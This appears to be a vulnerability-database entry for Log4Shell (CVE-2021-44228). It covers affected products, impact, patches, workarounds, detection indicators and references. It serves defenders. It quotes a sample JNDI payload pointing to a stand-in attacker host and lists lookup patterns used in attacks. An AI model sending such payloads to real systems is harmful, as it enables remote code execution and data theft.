CVE-2021-44228
📋 TL;DR
CVE-2021-44228 (Log4Shell) is a critical remote code execution vulnerability in Apache Log4j2 that allows attackers to execute arbitrary code by exploiting JNDI lookups in log messages. This affects any application using vulnerable versions of log4j-core that processes attacker-controlled input. The vulnerability is particularly dangerous because it can be triggered through various input vectors including HTTP headers, user agents, and form fields.
💻 Affected Systems
- Apache Log4j2
- Any Java application using log4j-core
📦 What is this software?
Advanced Malware Protection Virtual Private Cloud Appliance by Cisco
View all CVEs affecting Advanced Malware Protection Virtual Private Cloud Appliance →
Capital by Siemens
Capital by Siemens
Capital by Siemens
Common Services Platform Collector by Cisco
View all CVEs affecting Common Services Platform Collector →
Common Services Platform Collector by Cisco
View all CVEs affecting Common Services Platform Collector →
Common Services Platform Collector by Cisco
View all CVEs affecting Common Services Platform Collector →
Common Services Platform Collector by Cisco
View all CVEs affecting Common Services Platform Collector →
Common Services Platform Collector by Cisco
View all CVEs affecting Common Services Platform Collector →
Common Services Platform Collector by Cisco
View all CVEs affecting Common Services Platform Collector →
Common Services Platform Collector by Cisco
View all CVEs affecting Common Services Platform Collector →
Common Services Platform Collector by Cisco
View all CVEs affecting Common Services Platform Collector →
Common Services Platform Collector by Cisco
View all CVEs affecting Common Services Platform Collector →
Comos by Siemens
Contact Center Management Portal by Cisco
Crosswork Platform Infrastructure by Cisco
Crosswork Platform Infrastructure by Cisco
Crosswork Zero Touch Provisioning by Cisco
Crosswork Zero Touch Provisioning by Cisco
Cyber Vision Sensor Management Extension by Cisco
View all CVEs affecting Cyber Vision Sensor Management Extension →
Cyber Vision Sensor Management Extension by Cisco
View all CVEs affecting Cyber Vision Sensor Management Extension →
Email Security by Sonicwall
Energyip by Siemens
Energyip by Siemens
Energyip by Siemens
Energyip by Siemens
Evolved Programmable Network Manager by Cisco
View all CVEs affecting Evolved Programmable Network Manager →
Evolved Programmable Network Manager by Cisco
View all CVEs affecting Evolved Programmable Network Manager →
Evolved Programmable Network Manager by Cisco
View all CVEs affecting Evolved Programmable Network Manager →
Evolved Programmable Network Manager by Cisco
View all CVEs affecting Evolved Programmable Network Manager →
Evolved Programmable Network Manager by Cisco
View all CVEs affecting Evolved Programmable Network Manager →
Evolved Programmable Network Manager by Cisco
View all CVEs affecting Evolved Programmable Network Manager →
Evolved Programmable Network Manager by Cisco
View all CVEs affecting Evolved Programmable Network Manager →
Fedora by Fedoraproject
Fedora by Fedoraproject
Finesse by Cisco
Finesse by Cisco
Finesse by Cisco
Finesse by Cisco
Finesse by Cisco
Finesse by Cisco
Finesse by Cisco
Finesse by Cisco
Fxos by Cisco
Fxos by Cisco
Fxos by Cisco
Fxos by Cisco
Fxos by Cisco
Fxos by Cisco
Fxos by Cisco
Fxos by Cisco
Gma Manager by Siemens
Head End System Universal Device Integration System by Siemens
View all CVEs affecting Head End System Universal Device Integration System →
Integrated Management Controller Supervisor by Cisco
View all CVEs affecting Integrated Management Controller Supervisor →
Integrated Management Controller Supervisor by Cisco
View all CVEs affecting Integrated Management Controller Supervisor →
Integrated Management Controller Supervisor by Cisco
View all CVEs affecting Integrated Management Controller Supervisor →
Log4j by Apache
Log4j by Apache
Log4j by Apache
Log4j by Apache
Log4j by Apache
Log4j by Apache
Log4j by Apache
Mendix by Siemens
Mindsphere by Siemens
Navigator by Siemens
Network Dashboard Fabric Controller by Cisco
View all CVEs affecting Network Dashboard Fabric Controller →
Network Dashboard Fabric Controller by Cisco
View all CVEs affecting Network Dashboard Fabric Controller →
Network Dashboard Fabric Controller by Cisco
View all CVEs affecting Network Dashboard Fabric Controller →
Network Dashboard Fabric Controller by Cisco
View all CVEs affecting Network Dashboard Fabric Controller →
Network Dashboard Fabric Controller by Cisco
View all CVEs affecting Network Dashboard Fabric Controller →
Network Dashboard Fabric Controller by Cisco
View all CVEs affecting Network Dashboard Fabric Controller →
Network Dashboard Fabric Controller by Cisco
View all CVEs affecting Network Dashboard Fabric Controller →
Network Dashboard Fabric Controller by Cisco
View all CVEs affecting Network Dashboard Fabric Controller →
Network Insights For Data Center by Cisco
Nx by Siemens
Packaged Contact Center Enterprise by Cisco
View all CVEs affecting Packaged Contact Center Enterprise →
Packaged Contact Center Enterprise by Cisco
View all CVEs affecting Packaged Contact Center Enterprise →
Rhythmyx by Percussion
Siguard Dsa by Siemens
Snow Commander by Snowsoftware
Synchro by Bentley
Synchro 4d by Bentley
Teamcenter by Siemens
Unified Communications Manager Im \& Presence Service by Cisco
View all CVEs affecting Unified Communications Manager Im \& Presence Service →
Unified Communications Manager Im \& Presence Service by Cisco
View all CVEs affecting Unified Communications Manager Im \& Presence Service →
Unified Communications Manager Im And Presence Service by Cisco
View all CVEs affecting Unified Communications Manager Im And Presence Service →
Unified Communications Manager Im And Presence Service by Cisco
View all CVEs affecting Unified Communications Manager Im And Presence Service →
Unified Contact Center Enterprise by Cisco
Unified Contact Center Enterprise by Cisco
Unified Contact Center Enterprise by Cisco
Unified Contact Center Enterprise by Cisco
Unified Contact Center Enterprise by Cisco
Unified Contact Center Enterprise by Cisco
Unified Contact Center Enterprise by Cisco
Unified Contact Center Management Portal by Cisco
View all CVEs affecting Unified Contact Center Management Portal →
Vesys by Siemens
Vesys by Siemens
Vesys by Siemens
Vesys by Siemens
Vesys by Siemens
Vesys by Siemens
Video Surveillance Operations Manager by Cisco
View all CVEs affecting Video Surveillance Operations Manager →
Virtualized Infrastructure Manager by Cisco
View all CVEs affecting Virtualized Infrastructure Manager →
Virtualized Infrastructure Manager by Cisco
View all CVEs affecting Virtualized Infrastructure Manager →
Vm Access Proxy by Snowsoftware
Xcode by Apple
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise allowing attackers to execute arbitrary code, install malware, exfiltrate data, and pivot to other systems in the network.
Likely Case
Remote code execution leading to data theft, ransomware deployment, or cryptocurrency mining on vulnerable servers.
If Mitigated
Limited impact with proper network segmentation, egress filtering, and security controls preventing external JNDI connections.
🎯 Exploit Status
Mass exploitation observed in the wild. Simple payloads like ${jndi:ldap://attacker.com/a} can trigger the vulnerability.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.16.0 (or 2.12.2, 2.12.3, 2.3.1 for older branches)
Vendor Advisory: https://logging.apache.org/log4j/2.x/security.html
Restart Required: Yes
Instructions:
1. Identify all applications using log4j-core. 2. Update to log4j-core 2.16.0 or later. 3. Restart all affected applications. 4. Verify the fix by checking version and testing.
🔧 Temporary Workarounds
Disable JNDI lookups
allSet system property to disable JNDI lookups in log4j2
-Dlog4j2.formatMsgNoLookups=true
Remove JndiLookup class
linuxRemove the vulnerable class from log4j-core JAR file
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
🧯 If You Can't Patch
- Implement network egress filtering to block outbound LDAP, RMI, and DNS requests to untrusted destinations
- Use WAF rules to block ${jndi:} patterns in incoming requests
🔍 How to Verify
Check if Vulnerable:
Check application dependencies for log4j-core versions 2.0-beta9 through 2.15.0 (excluding 2.12.2, 2.12.3, 2.3.1)Check Version:
java -cp log4j-core-*.jar org.apache.logging.log4j.core.VersionVerify Fix Applied:
Verify log4j-core version is 2.16.0 or later, or 2.12.2/2.12.3/2.3.1📡 Detection & Monitoring
Log Indicators:
- ${jndi:}
- ${lower:
- ${upper:
- ${env:
- ${sys:
- ${java:
- ${date:
- ${ctx:
Network Indicators:
- Outbound LDAP/RMI/DNS requests from applications to suspicious domains
- Unusual Java process spawning
SIEM Query:
source="*log*" AND "${jndi:" OR "${lower:" OR "${upper:" OR "${env:" OR "${sys:"🔗 References
- http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html
- http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html
- http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html
- http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html
- http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html
- http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html
- http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html
- http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html
- http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html
- http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2022/Dec/2
- http://seclists.org/fulldisclosure/2022/Jul/11
- http://seclists.org/fulldisclosure/2022/Mar/23
- http://www.openwall.com/lists/oss-security/2021/12/10/1
- http://www.openwall.com/lists/oss-security/2021/12/10/2
- http://www.openwall.com/lists/oss-security/2021/12/10/3
- http://www.openwall.com/lists/oss-security/2021/12/13/1
- http://www.openwall.com/lists/oss-security/2021/12/13/2
- http://www.openwall.com/lists/oss-security/2021/12/14/4
- http://www.openwall.com/lists/oss-security/2021/12/15/3
- https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf
- https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf
- https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf
- https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf
- https://github.com/cisagov/log4j-affected-db
- https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md
- https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228
- https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/
- https://logging.apache.org/log4j/2.x/security.html
- https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
- https://security.netapp.com/advisory/ntap-20211210-0007/
- https://support.apple.com/kb/HT213189
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- https://twitter.com/kurtseifried/status/1469345530182455296
- https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001
- https://www.debian.org/security/2021/dsa-5020
- https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html
- https://www.kb.cert.org/vuls/id/930724
- https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html
- https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://www.oracle.com/security-alerts/cpujan2022.html
- http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html
- http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html
- http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html
- http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html
- http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html
- http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html
- http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html
- http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html
- http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html
- http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2022/Dec/2
- http://seclists.org/fulldisclosure/2022/Jul/11
- http://seclists.org/fulldisclosure/2022/Mar/23
- http://www.openwall.com/lists/oss-security/2021/12/10/1
- http://www.openwall.com/lists/oss-security/2021/12/10/2
- http://www.openwall.com/lists/oss-security/2021/12/10/3
- http://www.openwall.com/lists/oss-security/2021/12/13/1
- http://www.openwall.com/lists/oss-security/2021/12/13/2
- http://www.openwall.com/lists/oss-security/2021/12/14/4
- http://www.openwall.com/lists/oss-security/2021/12/15/3
- https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf
- https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf
- https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf
- https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf
- https://github.com/cisagov/log4j-affected-db
- https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md
- https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228
- https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/
- https://logging.apache.org/log4j/2.x/security.html
- https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
- https://security.netapp.com/advisory/ntap-20211210-0007/
- https://support.apple.com/kb/HT213189
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- https://twitter.com/kurtseifried/status/1469345530182455296
- https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001
- https://www.debian.org/security/2021/dsa-5020
- https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html
- https://www.kb.cert.org/vuls/id/930724
- https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html
- https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228
